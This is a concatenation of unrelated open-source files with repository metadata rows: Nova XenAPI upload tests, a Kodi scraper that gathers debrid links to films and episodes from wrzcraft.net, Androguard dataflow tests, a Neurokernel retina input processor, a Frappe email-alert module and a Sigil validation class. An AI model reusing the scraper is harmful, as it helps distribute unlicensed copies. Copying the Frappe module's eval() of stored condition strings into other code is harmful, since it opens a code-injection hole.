self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.session.call_plugin_serialized('glance', 'upload_vhd', **params)
self.mox.ReplayAll()
self.store.upload_image(self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
def test_upload_image(self):
self._test_upload_image(True)
def test_upload_image_None_os_type(self):
self.instance['os_type'] = None
self._test_upload_image(True, 'linux')
def test_upload_image_no_os_type(self):
del self.instance['os_type']
self._test_upload_image(True, 'linux')
def test_upload_image_auto_config_disk_disabled(self):
sys_meta = [{"key": "image_auto_disk_config", "value": "Disabled"}]
self.instance["system_metadata"] = sys_meta
self._test_upload_image("disabled")
def test_upload_image_raises_exception(self):
params = self._get_upload_params()
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(RuntimeError)
self.mox.ReplayAll()
self.assertRaises(RuntimeError, self.store.upload_image,
self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
def test_upload_image_retries_then_raises_exception(self):
self.flags(num_retries=2, group='glance')
params = self._get_upload_params()
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.mox.StubOutWithMock(time, 'sleep')
self.mox.StubOutWithMock(compute_utils, 'add_instance_fault_from_exc')
error_details = ["", "", "RetryableError", ""]
error = self.session.XenAPI.Failure(details=error_details)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(0.5)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(1)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
self.mox.ReplayAll()
self.assertRaises(exception.CouldNotUploadImage,
self.store.upload_image,
self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
def test_upload_image_retries_on_signal_exception(self):
self.flags(num_retries=2, group='glance')
params = self._get_upload_params()
self.mox.StubOutWithMock(self.session, 'call_plugin_serialized')
self.mox.StubOutWithMock(time, 'sleep')
self.mox.StubOutWithMock(compute_utils, 'add_instance_fault_from_exc')
error_details = ["", "task signaled", "", ""]
error = self.session.XenAPI.Failure(details=error_details)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(0.5)
# Note(johngarbutt) XenServer 6.1 and later has this error
error_details = ["", "signal: SIGTERM", "", ""]
error = self.session.XenAPI.Failure(details=error_details)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params).AndRaise(error)
compute_utils.add_instance_fault_from_exc(self.context, self.instance,
error, (fake.Failure,
error,
mox.IgnoreArg()))
time.sleep(1)
self.session.call_plugin_serialized('glance', 'upload_vhd',
**params)
self.mox.ReplayAll()
self.store.upload_image(self.context, self.session, self.instance,
'fake_image_uuid', ['fake_vdi_uuid'])
self.mox.VerifyAll()
| apache-2.0 | 5,720,992,741,060,890,000 | 44.429688 | 79 | 0.527945 | false |
repotvsupertuga/repo | instal/script.module.stream.tvsupertuga.addon/resources/lib/sources/en/wrzcraft.py | 8 | 6752 | # -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['wrzcraft.net']
self.base_link = 'http://wrzcraft.net'
self.search_link = '/search/%s/feed/rss2/'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() == False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['tvshowtitle'] if 'tvshowtitle' in data else data['title']
hdlr = 'S%02dE%02d' % (int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else data['year']
query = '%s S%02dE%02d' % (data['tvshowtitle'], int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = self.search_link % urllib.quote_plus(query)
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
posts = client.parseDOM(r, 'item')
hostDict = hostprDict + hostDict
items = []
for post in posts:
try:
t = client.parseDOM(post, 'title')[0]
c = client.parseDOM(post, 'content.+?')[0]
u = client.parseDOM(c, 'p')
u = [client.parseDOM(i, 'a', ret='href') for i in u]
u = [i[0] for i in u if len(i) == 1]
if not u: raise Exception()
if 'tvshowtitle' in data:
u = [(re.sub('(720p|1080p)', '', t) + ' ' + [x for x in i.strip('//').split('/')][-1], i) for i in u]
else:
u = [(t, i) for i in u]
items += u
except:
pass
for item in items:
try:
name = item[0]
name = client.replaceHTMLCodes(name)
t = re.sub('(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*|3D)(\.|\)|\]|\s|)(.+|)', '', name)
if not cleantitle.get(t) == cleantitle.get(title): raise Exception()
y = re.findall('[\.|\(|\[|\s](\d{4}|S\d*E\d*|S\d*)[\.|\)|\]|\s]', name)[-1].upper()
if not y == hdlr: raise Exception()
fmt = re.sub('(.+)(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*)(\.|\)|\]|\s)', '', name.upper())
fmt = re.split('\.|\(|\)|\[|\]|\s|\-', fmt)
fmt = [i.lower() for i in fmt]
if any(i.endswith(('subs', 'sub', 'dubbed', 'dub')) for i in fmt): raise Exception()
if any(i in ['extras'] for i in fmt): raise Exception()
if '1080p' in fmt: quality = '1080p'
elif '720p' in fmt: quality = 'HD'
else: quality = 'SD'
if any(i in ['dvdscr', 'r5', 'r6'] for i in fmt): quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts'] for i in fmt): quality = 'CAM'
info = []
if '3d' in fmt: info.append('3D')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+) (?:GB|GiB|MB|MiB))', item[2])[-1]
div = 1 if size.endswith(('GB', 'GiB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size))/div
size = '%.2f GB' % size
info.append(size)
except:
pass
if any(i in ['hevc', 'h265', 'x265'] for i in fmt): info.append('HEVC')
info = ' | '.join(info)
url = item[1]
if any(x in url for x in ['.rar', '.zip', '.iso']): raise Exception()
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if not host in hostDict: raise Exception()
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'info': info, 'direct': False, 'debridonly': True})
except:
pass
check = [i for i in sources if not i['quality'] == 'CAM']
if check: sources = check
return sources
except:
return sources
def resolve(self, url):
return url
| gpl-2.0 | -5,193,886,154,355,285,000 | 35.497297 | 172 | 0.475118 | false |
zyrikby/androguard | androguard/decompiler/dad/tests/dataflow_test.py | 14 | 14248 | """Tests for def_use."""
import sys
sys.path.append('.')
import collections
import mock
import unittest
from androguard.decompiler.dad import dataflow
from androguard.decompiler.dad import graph
from androguard.decompiler.dad import node
from androguard.decompiler.dad import instruction
from androguard.decompiler.dad import basic_blocks
class DataflowTest(unittest.TestCase):
def _CreateMockIns(self, uses, lhs=None):
mock_ins = mock.create_autospec(instruction.IRForm)
mock_ins.get_used_vars.return_value = uses
mock_ins.get_lhs.return_value = lhs
return mock_ins
def _CreateMockNode(self, node_name, start_ins_idx, lins):
mock_node = mock.create_autospec(
basic_blocks.BasicBlock,
_name=node_name)
mock_node.__repr__ = mock.Mock(return_value=node_name)
loc_ins = []
ins_idx = start_ins_idx
for ins in lins:
uses, lhs = ins
mock_ins = self._CreateMockIns(uses)
mock_ins.get_lhs.return_value = lhs
loc_ins.append((ins_idx, mock_ins))
ins_idx += 1
mock_node.get_loc_with_ins.return_value = loc_ins
return mock_node
def _CreateMockGraph(self, lparams, lidx_ins):
entry = mock.create_autospec(basic_blocks.BasicBlock)
rpo = [entry]
node_num = 1
for idx, lins in lidx_ins:
rpo.append(self._CreateMockNode('n%d' % node_num, idx, lins))
node_num += 1
G = mock.create_autospec(graph.Graph)
G.rpo = rpo
return G
"""
This tests the reach def analysis with:
int GCD(int a, int b){
node1:
0. int c = a;
1. int d = b;
node2:
2. if(c == 0)
node3:
3. ret = d; (goto 9.)
node4:
4. while(d != 0){
node5
5. if(c > d)
node6:
6. c = c - d;
node7: else
7. d = d - c;
node8: }
8. ret = c;
node9:
9. return ret;
}
"""
def testReachDefGCD(self):
n1 = self._CreateMockNode('n1', 0, [(['a'], 'c'), (['b'], 'd')])
n2 = self._CreateMockNode('n2', 2, [(['c'], None)])
n3 = self._CreateMockNode('n3', 3, [(['d'], 'ret')])
n4 = self._CreateMockNode('n4', 4, [(['d'], None)])
n5 = self._CreateMockNode('n5', 5, [(['c', 'd'], None)])
n6 = self._CreateMockNode('n6', 6, [(['c', 'd'], 'c')])
n7 = self._CreateMockNode('n7', 7, [(['c', 'd'], 'd')])
n8 = self._CreateMockNode('n8', 8, [(['c'], 'ret')])
n9 = self._CreateMockNode('n9', 9, [(['ret'], None)])
sucs = {
n1: [n2],
n2: [n3, n4],
n3: [n9],
n4: [n5, n8],
n5: [n6, n7],
n6: [n8],
n7: [n8],
n8: [n9]
}
preds = collections.defaultdict(list)
for pred, lsucs in sucs.iteritems():
for suc in lsucs:
preds[suc].append(pred)
def add_edge(x, y):
sucs.setdefault(x, []).append(y)
preds.setdefault(y, []).append(x)
graph_mock = mock.create_autospec(graph.Graph)
graph_mock.entry = n1
graph_mock.exit = n9
graph_mock.rpo = [n1, n2, n3, n4, n5, n6, n7, n8, n9]
graph_mock.all_preds.side_effect = lambda x: preds[x]
graph_mock.all_sucs.side_effect = lambda x: sucs.get(x, [])
graph_mock.add_edge.side_effect = add_edge
with mock.patch.object(dataflow, 'DummyNode') as dummynode_mock:
dummy_entry_mock = mock.Mock(name='entry')
dummy_exit_mock = mock.Mock(name='exit')
for dummy_mock in dummy_entry_mock, dummy_exit_mock:
dummy_mock.get_loc_with_ins.return_value = []
dummynode_mock.side_effect = [dummy_entry_mock, dummy_exit_mock]
analysis = dataflow.reach_def_analysis(graph_mock, set(['a', 'b']))
expected_A = {
dummy_entry_mock: set([-2, -1]),
n1: set([-2, -1, 0, 1]),
n2: set([-2, -1, 0, 1]),
n3: set([-2, -1, 0, 1, 3]),
n4: set([-2, -1, 0, 1]),
n5: set([-2, -1, 0, 1]),
n6: set([-2, -1, 1, 6]),
n7: set([-2, -1, 0, 7]),
n8: set([-2, -1, 0, 1, 6, 7, 8]),
n9: set([-2, -1, 0, 1, 3, 6, 7, 8]),
dummy_exit_mock: set([-2, -1, 0, 1, 3, 6, 7, 8])
}
expected_R = {
n1: set([-2, -1]),
n2: set([-2, -1, 0, 1]),
n3: set([-2, -1, 0, 1]),
n4: set([-2, -1, 0, 1]),
n5: set([-2, -1, 0, 1]),
n6: set([-2, -1, 0, 1]),
n7: set([-2, -1, 0, 1]),
n8: set([-2, -1, 0, 1, 6, 7]),
n9: set([-2, -1, 0, 1, 3, 6, 7, 8]),
dummy_exit_mock: set([-2, -1, 0, 1, 3, 6, 7, 8])
}
expected_def_to_loc = {
'a': set([-1]),
'b': set([-2]),
'c': set([0, 6]),
'd': set([1, 7]),
'ret': set([3, 8])
}
self.assertDictEqual(analysis.A, expected_A)
self.assertDictEqual(analysis.R, expected_R)
self.assertDictEqual(analysis.def_to_loc, expected_def_to_loc)
@mock.patch.object(dataflow, 'reach_def_analysis')
def testDefUseGCD(self, mock_reach_def):
"""Test def use with the GCD function above."""
n1 = self._CreateMockNode('n1', 0, [(['a'], 'c'), (['b'], 'd')])
n2 = self._CreateMockNode('n2', 2, [(['c'], None)])
n3 = self._CreateMockNode('n3', 3, [(['d'], 'ret')])
n4 = self._CreateMockNode('n4', 4, [(['d'], None)])
n5 = self._CreateMockNode('n5', 5, [(['c', 'd'], None)])
n6 = self._CreateMockNode('n6', 6, [(['c', 'd'], 'c')])
n7 = self._CreateMockNode('n7', 7, [(['c', 'd'], 'd')])
n8 = self._CreateMockNode('n8', 8, [(['c'], 'ret')])
n9 = self._CreateMockNode('n9', 9, [(['ret'], None)])
graph_mock = mock.create_autospec(graph.Graph)
graph_mock.rpo = [n1, n2, n3, n4, n5, n6, n7, n8, n9]
mock_analysis = mock_reach_def.return_value
mock_analysis.def_to_loc = {
'a': set([-1]),
'b': set([-2]),
'c': set([0, 6]),
'd': set([1, 7]),
'ret': set([3, 8])
}
mock_analysis.defs = {
n1: {'c': set([0]),
'd': set([1])},
n2: {},
n3: {'ret': set([3])},
n4: {},
n5: {},
n6: {'c': set([6])},
n7: {'d': set([7])},
n8: {'ret': set([8])},
n9: {}
}
mock_analysis.R = {
n1: set([-2, -1]),
n2: set([-2, -1, 0, 1]),
n3: set([-2, -1, 0, 1]),
n4: set([-2, -1, 0, 1]),
n5: set([-2, -1, 0, 1]),
n6: set([-2, -1, 0, 1]),
n7: set([-2, -1, 0, 1]),
n8: set([-2, -1, 0, 1, 6, 7]),
n9: set([-2, -1, 0, 1, 3, 6, 7, 8])
}
expected_du = {
('a', -1): [0],
('b', -2): [1],
('c', 0): [2, 5, 6, 7, 8],
('c', 6): [8],
('d', 1): [3, 4, 5, 6, 7],
('ret', 3): [9],
('ret', 8): [9]
}
expected_ud = {
('a', 0): [-1],
('b', 1): [-2],
('c', 2): [0],
('c', 5): [0],
('c', 6): [0],
('c', 7): [0],
('c', 8): [0, 6],
('d', 3): [1],
('d', 4): [1],
('d', 5): [1],
('d', 6): [1],
('d', 7): [1],
('ret', 9): [3, 8]
}
ud, du = dataflow.build_def_use(graph_mock, mock.sentinel)
self.assertItemsEqual(du, expected_du)
for entry in du:
self.assertItemsEqual(du[entry], expected_du[entry])
self.assertItemsEqual(ud, expected_ud)
for entry in ud:
self.assertItemsEqual(ud[entry], expected_ud[entry])
@mock.patch.object(dataflow, 'reach_def_analysis')
def testDefUseIfBool(self, mock_reach_def):
n1 = self._CreateMockNode('n1', 0, [([], 0), ([2], None)])
n2 = self._CreateMockNode('n1', 2, [([3], None)])
n3 = self._CreateMockNode('n3', 3, [([3], None)])
n4 = self._CreateMockNode('n4', 4, [([], 0)])
n5 = self._CreateMockNode('n5', 5, [([0], 0)])
n6 = self._CreateMockNode('n6', 6, [([2], 1), ([0, 1], 0)])
n7 = self._CreateMockNode('n7', 8, [([0], None)])
graph_mock = mock.create_autospec(graph.Graph)
graph_mock.rpo = [n1, n2, n3, n4, n5, n6, n7]
mock_analysis = mock_reach_def.return_value
mock_analysis.def_to_loc = {
0: set([0, 4, 5, 7]),
1: set([6]),
2: set([-1]),
3: set([-2])
}
mock_analysis.defs = {
n1: {0: set([0])},
n2: {},
n3: {},
n4: {0: set([4])},
n5: {0: set([5])},
n6: {0: set([7]),
1: set([6])},
n7: {}
}
mock_analysis.R = {
n1: set([-1, -2]),
n2: set([0, -2, -1]),
n3: set([0, -1, -2]),
n4: set([0, -2, -1]),
n5: set([0, -2, -1]),
n6: set([0, -1, -2]),
n7: set([4, -1, 6, 7, -2, 5])
}
expected_du = {
(0, 0): [7, 5],
(0, 4): [8],
(0, 5): [8],
(0, 7): [8],
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3]
}
expected_ud = {
(0, 5): [0],
(0, 7): [0],
(0, 8): [4, 5, 7],
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2]
}
ud, du = dataflow.build_def_use(graph_mock, mock.sentinel)
self.assertEqual(du, expected_du)
self.assertEqual(ud, expected_ud)
def testGroupVariablesGCD(self):
du = {
('a', -1): [0],
('b', -2): [1],
('c', 0): [2, 5, 6, 7, 8],
('c', 6): [8],
('d', 1): [3, 4, 5, 6, 7],
('ret', 3): [9],
('ret', 8): [9]
}
ud = {
('a', 0): [-1],
('b', 1): [-2],
('c', 2): [0],
('c', 5): [0],
('c', 6): [0],
('c', 7): [0],
('c', 8): [0, 6],
('d', 3): [1],
('d', 4): [1],
('d', 5): [1],
('d', 6): [1],
('d', 7): [1],
('ret', 9): [3, 8]
}
expected_groups = {
'a': [([-1], [0])],
'b': [([-2], [1])],
'c': [([0, 6], [8, 2, 5, 6, 7])],
'd': [([1], [3, 4, 5, 6, 7])],
'ret': [([3, 8], [9])]
}
groups = dataflow.group_variables(['a', 'b', 'c', 'd', 'ret'], du, ud)
self.assertEqual(groups, expected_groups)
def testGroupVariablesIfBool(self):
du = {
(0, 0): [7, 5],
(0, 4): [8],
(0, 5): [8],
(0, 7): [8],
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3]
}
ud = {
(0, 5): [0],
(0, 7): [0],
(0, 8): [4, 5, 7],
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2]
}
groups = dataflow.group_variables([0, 1, 2, 3], du, ud)
expected_groups = {
0: [([0], [5, 7]), ([4, 5, 7], [8])],
1: [([6], [7])],
2: [([-1], [1, 6])],
3: [([-2], [2, 3])]
}
self.assertItemsEqual(groups, expected_groups)
for entry in groups:
self.assertItemsEqual(groups[entry], expected_groups[entry])
@mock.patch.object(dataflow, 'group_variables')
def testSplitVariablesGCD(self, group_variables_mock):
group = {
'a': [([-1], [0])],
'b': [([-2], [1])],
'c': [([0, 6], [2, 5, 6, 7, 8])],
'd': [([1], [3, 4, 5, 6, 7])],
'ret': [([3, 8], [9])]
}
group_variables_mock.return_value = group
dataflow.split_variables(
mock.sentinel, [0, 1, 2, 3, 4], mock.sentinel, mock.sentinel)
@mock.patch.object(dataflow, 'group_variables')
def testSplitVariablesIfBool(self, group_variables_mock):
group = {
0: [([0], [5, 7]), ([4, 5, 7], [8])],
1: [([6], [7])],
2: [([-1], [1, 6])],
3: [([-2], [2, 3])]
}
group_variables_mock.return_value = group
param1_mock = mock.Mock()
param2_mock = mock.Mock()
var0_mock = mock.Mock()
var1_mock = mock.Mock()
lvars = {0: var0_mock, 1: var1_mock, 2: param1_mock, 3: param2_mock}
du = {
(0, 0): [7, 5],
(0, 4): [8],
(0, 5): [8],
(0, 7): [8],
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3]
}
ud = {
(0, 5): [0],
(0, 7): [0],
(0, 8): [4, 5, 7],
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2]
}
graph_mock = mock.Mock()
dataflow.split_variables(graph_mock, lvars, du, ud)
expected_du = {
(1, 6): [7],
(2, -1): [6, 1],
(3, -2): [2, 3],
(4, 0): [7, 5],
(5, 4): [8],
(5, 5): [8],
(5, 7): [8]
}
expected_ud = {
(1, 7): [6],
(2, 1): [-1],
(2, 6): [-1],
(3, 2): [-2],
(3, 3): [-2],
(4, 5): [0],
(4, 7): [0],
(5, 8): [4, 5, 7]
}
self.assertEqual(du, expected_du)
self.assertEqual(ud, expected_ud)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 8,023,422,970,382,853,000 | 31.381818 | 79 | 0.380685 | false |
neurokernel/retina | retina/InputProcessors/RetinaInputProcessor.py | 1 | 4648 | #!/usr/bin/env python
import numpy as np
import h5py
from neurokernel.LPU.utils.simpleio import *
import retina.classmapper as cls_map
import pycuda.driver as cuda
from neurokernel.LPU.InputProcessors.BaseInputProcessor import BaseInputProcessor
class RetinaInputProcessor(BaseInputProcessor):
def __init__(self, config, retina):
self.config = config
self.screen_type = config['Retina']['screentype']
self.filtermethod = config['Retina']['filtermethod']
screen_cls = cls_map.get_screen_cls(self.screen_type)
self.screen = screen_cls(config)
self.retina = retina
uids = ['neuron_{}_{}_photon'.format(name, i) for i in range(retina.num_elements)
for name in ['R1', 'R2', 'R3', 'R4', 'R5', 'R6']]
super(RetinaInputProcessor, self).__init__([('photon',uids)], mode=0)
def pre_run(self):
self.generate_receptive_fields()
self.generate_datafiles()
self.input_file_handle = h5py.File(self.input_file, 'w')
self.input_file_handle.create_dataset('metadata', (), 'i')
self.input_file_handle['metadata'].attrs['dt'] = self.config['General']['dt']
self.input_file_handle['metadata'].attrs['screentype'] = self.config['Retina']['screentype']
self.input_file_handle['metadata'].attrs['rings'] = self.config['Retina']['rings']
self.input_file_handle['metadata'].attrs['dt'] = self.config['Retina']['intype']
self.input_file_handle.create_dataset(
'photon/data',
(0, self.retina.num_photoreceptors),
dtype=np.float64,
maxshape=(None, self.retina.num_photoreceptors))
self.input_file_handle.create_dataset(
'photon/uids',
data=np.array(self.variables['photon']['uids'], dtype = 'S'))
def generate_datafiles(self):
screen = self.screen
retina = self.retina
config = self.config
rfs = self.rfs
screen.setup_file('intensities.h5')
retina_elev_file = 'retina_elev.h5'
retina_azim_file = 'retina_azim.h5'
screen_dima_file = 'grid_dima.h5'
screen_dimb_file = 'grid_dimb.h5'
retina_dima_file = 'retina_dima.h5'
retina_dimb_file = 'retina_dimb.h5'
self.input_file = '{}.h5'.format(config['Retina']['input_file'])
elev_v, azim_v = retina.get_ommatidia_pos()
for data, filename in [(elev_v, retina_elev_file),
(azim_v, retina_azim_file),
(screen.grid[0], screen_dima_file),
(screen.grid[1], screen_dimb_file),
(rfs.refa, retina_dima_file),
(rfs.refb, retina_dimb_file)]:
write_array(data, filename)
self.file_open = False
def generate_receptive_fields(self):
#TODO intensities file should also be written but is omitted for
# performance reasons
retina = self.retina
screen = self.screen
screen_type = self.screen_type
filtermethod = self.filtermethod
mapdr_cls = cls_map.get_mapdr_cls(screen_type)
projection_map = mapdr_cls.from_retina_screen(retina, screen)
rf_params = projection_map.map(*retina.get_all_photoreceptors_dir())
if np.isnan(np.sum(rf_params)):
print('Warning, Nan entry in array of receptive field centers')
if filtermethod == 'gpu':
vrf_cls = cls_map.get_vrf_cls(screen_type)
else:
vrf_cls = cls_map.get_vrf_no_gpu_cls(screen_type)
rfs = vrf_cls(screen.grid)
rfs.load_parameters(refa=rf_params[0], refb=rf_params[1],
acceptance_angle=retina.get_angle(),
radius=screen.radius)
rfs.generate_filters()
self.rfs = rfs
def update_input(self):
im = self.screen.get_screen_intensity_steps(1)
# reshape neede for inputs in order to write file to an array
inputs = self.rfs.filter_image_use(im).get().reshape((-1))
self.input_file_handle['photon/data'].resize(
(self.input_file_handle['photon/data'].shape[0]+1,
len(self.variables['photon']['uids'])))
self.input_file_handle['photon/data'][-1,:] = inputs
self.variables['photon']['input'][:] = inputs
def is_input_available(self):
return True
def post_run(self):
self.input_file_handle.close()
def __del__(self):
try:
self.input_file_handle.close()
except:
pass
| bsd-3-clause | -5,776,355,278,828,769,000 | 35.888889 | 100 | 0.584552 | false |
sbkolate/sap_frappe_v6 | frappe/email/doctype/email_alert/email_alert.py | 3 | 4011 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
import json
from frappe import _
from frappe.model.document import Document
from frappe.utils import validate_email_add, nowdate
class EmailAlert(Document):
def validate(self):
if self.event in ("Days Before", "Days After") and not self.date_changed:
frappe.throw(_("Please specify which date field must be checked"))
if self.event=="Value Change" and not self.value_changed:
frappe.throw(_("Please specify which value field must be checked"))
forbidden_document_types = ("Bulk Email",)
if (self.document_type in forbidden_document_types
or frappe.get_meta(self.document_type).istable):
# currently email alerts don't work on child tables as events are not fired for each record of child table
frappe.throw(_("Cannot set Email Alert on Document Type {0}").format(self.document_type))
def trigger_daily_alerts():
trigger_email_alerts(None, "daily")
def trigger_email_alerts(doc, method=None):
if frappe.flags.in_import or frappe.flags.in_patch:
# don't send email alerts while syncing or patching
return
if method == "daily":
for alert in frappe.db.sql_list("""select name from `tabEmail Alert`
where event in ('Days Before', 'Days After') and enabled=1"""):
alert = frappe.get_doc("Email Alert", alert)
diff_days = alert.days_in_advance
if alert.event=="Days After":
diff_days = -diff_days
for name in frappe.db.sql_list("""select name from `tab{0}` where
DATE({1}) = ADDDATE(DATE(%s), INTERVAL %s DAY)""".format(alert.document_type, alert.date_changed),
(nowdate(), diff_days or 0)):
evaluate_alert(frappe.get_doc(alert.document_type, name),
alert, alert.event)
else:
if method in ("on_update", "validate") and doc.flags.in_insert:
# don't call email alerts multiple times for inserts
# on insert only "New" type alert must be called
return
eevent = {
"on_update": "Save",
"after_insert": "New",
"validate": "Value Change",
"on_submit": "Submit",
"on_cancel": "Cancel",
}[method]
for alert in frappe.db.sql_list("""select name from `tabEmail Alert`
where document_type=%s and event=%s and enabled=1""", (doc.doctype, eevent)):
evaluate_alert(doc, alert, eevent)
def evaluate_alert(doc, alert, event):
if isinstance(alert, basestring):
alert = frappe.get_doc("Email Alert", alert)
context = {"doc": doc, "nowdate": nowdate}
if alert.condition:
if not eval(alert.condition, context):
return
if event=="Value Change" and not doc.is_new():
if doc.get(alert.value_changed) == frappe.db.get_value(doc.doctype,
doc.name, alert.value_changed):
return # value not changed
for recipient in alert.recipients:
recipients = []
if recipient.condition:
if not eval(recipient.condition, context):
continue
if recipient.email_by_document_field:
if validate_email_add(doc.get(recipient.email_by_document_field)):
recipients.append(doc.get(recipient.email_by_document_field))
# else:
# print "invalid email"
if recipient.cc:
recipient.cc = recipient.cc.replace(",", "\n")
recipients = recipients + recipient.cc.split("\n")
if not recipients:
return
subject = alert.subject
if event != "Value Change" and not doc.is_new():
# reload the doc for the latest values & comments,
# except for validate type event.
doc = frappe.get_doc(doc.doctype, doc.name)
context = {"doc": doc, "alert": alert, "comments": None}
if doc.get("_comments"):
context["comments"] = json.loads(doc.get("_comments"))
if "{" in subject:
subject = frappe.render_template(alert.subject, context)
frappe.sendmail(recipients=recipients, subject=subject,
message= frappe.render_template(alert.message, context),
bulk=True, reference_doctype = doc.doctype, reference_name = doc.name,
attachments = [frappe.attach_print(doc.doctype, doc.name)] if alert.attach_print else None)
| mit | 2,750,044,336,936,229,400 | 32.705882 | 109 | 0.704562 | false |
Dave-ts/Sigil | src/Resource_Files/plugin_launchers/python/validationcontainer.py | 9 | 2091 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Copyright (c) 2014 Kevin B. Hendricks, John Schember, and Doug Massay
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
# WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import unicode_literals, division, absolute_import, print_function
from outputcontainer import OutputContainer
from validationresult import ValidationResult
class ValidationContainer(OutputContainer):
TYPE_INFO = 'info'
TYPE_WARN = 'warning'
TYPE_ERROR = 'error'
def __init__(self, wrapper, debug=False):
# List of validation results
self.results = []
super(ValidationContainer, self).__init__(wrapper, debug)
def add_result(self, restype, filename, linenumber, message):
self.results.append(ValidationResult(restype, filename, linenumber, message))
| gpl-3.0 | -4,743,733,439,009,246,000 | 45.466667 | 89 | 0.761836 | false |
